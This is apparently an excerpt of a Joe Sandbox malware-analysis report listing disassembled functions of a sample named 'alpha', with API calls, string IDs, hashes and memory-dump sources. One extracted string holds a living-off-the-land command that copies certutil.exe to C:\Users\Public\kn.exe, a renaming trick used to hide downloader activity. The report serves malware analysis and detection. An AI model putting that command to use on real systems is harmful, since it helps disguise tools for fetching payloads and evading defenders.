                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                          • API String ID: 1795611712-3662956551
                                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                          • Instruction ID: 6fa1048fff5772e3e3b96b9e69ebe45b326370c68369c5df8b013d1f2747177c
                                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                          • Instruction Fuzzy Hash: EFE1B0A1A0A642C6EB56AB6CF8501B9E6A1FF4978CFC64131D90E476B5EF3CE504C320
                                                                                                          Function 00007FF7AB14EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsupr.MSVCRT ref: 00007FF7AB14EF33
                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EF98
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFA9
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFBF
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7AB14EFDC
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFED
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F003
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F022
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F083
                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F092
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F0A5
                                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7AB14F0DB
                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F135
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F16C
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F185
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                          • API String ID: 1161012917-1690691951
                                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                          • Instruction ID: b2d2335f330b70a60a519a62594fc9c7567e1e5da69b33361c753d49da6bd543
                                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                          • Instruction Fuzzy Hash: B991A562B0665286FB06BB68F4501BDABA0BF49B5CF864235DD0E437B4EF3CA4448320
                                                                                                          Function 00007FF7AB1232B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1232F3
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7AB1232A4), ref: 00007FF7AB123309
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7AB123384
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB1411DF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 611521582-0
                                                                                                          • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                          • Instruction ID: a3fac9d18bb3d03c077a246fea68b59856ed58aece9752cb234d5f5c0bdc5086
                                                                                                          • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                          • Instruction Fuzzy Hash: 37A1C421F0A612CAF716AB69F4442BDEAA1FB49B49F865135CD0E477B0EF3CA4458720
                                                                                                          Function 00007FF7AB121560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                          • String ID: \\?\
                                                                                                          • API String ID: 628682198-4282027825
                                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                          • Instruction ID: add119fcedba83c4f7ed0a8e6d0c23fbb88c7c828f854d76af89bcfd00858d13
                                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                          • Instruction Fuzzy Hash: 3DE19122A1A682D6EB66EB28F8402F9A3A0FB4574DF815135DA0E477B4EF3CD555C310
                                                                                                          Function 00007FF7AB14AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 16309207-0
                                                                                                          • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                          • Instruction ID: 6485b47a38933f44143f4df09b87383773198a73271a9fee8a598d48c930260e
                                                                                                          • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                          • Instruction Fuzzy Hash: 6B22C462706B82C6EB66AF28E8502FAB7A0FF45788F814135DA0E477B5EF3CD1458710
                                                                                                          Function 00007FF7AB12CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                          • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 3863671652-4137775220
                                                                                                          • Opcode ID: cbcadc054eb77bad08336fccbc61f3cbbe122405676500104a0b59942f63a69b
                                                                                                          • Instruction ID: 4533d5c81c55aad01730d38684775f7593f387fe00462a458a1fa7171c814ae4
                                                                                                          • Opcode Fuzzy Hash: cbcadc054eb77bad08336fccbc61f3cbbe122405676500104a0b59942f63a69b
                                                                                                          • Instruction Fuzzy Hash: 3EE18D21A0B342C6FAAABB1DF454379A690BF49748FD74535CA0E422F4EF3CE4468721
                                                                                                          Function 00007FF7AB123410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                          • String ID: $Application$System
                                                                                                          • API String ID: 3538039442-1881496484
                                                                                                          • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                          • Instruction ID: df813fa986b3e7ca9aac417562cbdecacc9e4da098d91fbec0859704e68d9c87
                                                                                                          • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                          • Instruction Fuzzy Hash: B951A272A0AB4197EB229B19F44467AFAA1FB89B48F864234DE4E43774EF3CD445C710
                                                                                                          Function 00007FF7AB14D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB14048E), ref: 00007FF7AB14DA58
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DAD6
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DAFC
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DB22
                                                                                                            • Part of subcall function 00007FF7AB133A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                            • Part of subcall function 00007FF7AB125194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7AB1251C4
                                                                                                            • Part of subcall function 00007FF7AB13823C: FindFirstFileExW.KERNELBASE ref: 00007FF7AB138280
                                                                                                            • Part of subcall function 00007FF7AB13823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB13829D
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                            • Part of subcall function 00007FF7AB124FE8: _get_osfhandle.MSVCRT ref: 00007FF7AB125012
                                                                                                            • Part of subcall function 00007FF7AB124FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125030
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14DDB0
                                                                                                            • Part of subcall function 00007FF7AB1259E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125A2E
                                                                                                            • Part of subcall function 00007FF7AB1259E4: _open_osfhandle.MSVCRT ref: 00007FF7AB125A4F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14DDEB
                                                                                                          • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14DDFA
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E204
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E223
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E242
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                          • String ID: %9d$%s$~
                                                                                                          • API String ID: 3651208239-912394897
                                                                                                          • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                          • Instruction ID: bd8f269c2a165d4fe27e7b60004d984a79b7df2f2f244fe0b1e1c5d094a24e7a
                                                                                                          • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                          • Instruction Fuzzy Hash: 3B42C372A0968286EB66BF28F8501FDB3A0FB4574CF810436D60D47AB9EF3CE9558710
                                                                                                          Function 00007FF7AB12372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                          • String ID: COPYCMD$\
                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction ID: 9bd5bc5a62acdcbfd3d05b01c39a3a0677e118c48fe3fffa944f31d8a774b1f1
                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction Fuzzy Hash: C5F1D365A0A786C5EA56BB19F4402BAE7A0FF45B8CF968135CA4E077B4EE3CE445C310
                                                                                                          Function 00007FF7AB133140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                          • API String ID: 55602301-2548490036
                                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                          • Instruction ID: 4c6f0cceda0d7ad6ac2ac66ac3b7561f6cf84792a3df196b658a147f9cb0bc14
                                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                          • Instruction Fuzzy Hash: EDA1B433A0A74296EB56AB18F4405BAF7A0FB44758FD20135DA4E436B4EF3CE548C760
                                                                                                          Function 00007FF7AB151538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3935429995-0
                                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                          • Instruction ID: d0a42f2dbe28a034d0d0ec364c7e23aebc90fb2bc874cc0a3eabc26c58f231e9
                                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                          • Instruction Fuzzy Hash: A561B022A1969282E712AF2DF484579FBA4FB89F58F868234DE4B437B0DF3CD4019710
                                                                                                          Function 00007FF7AB1235B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
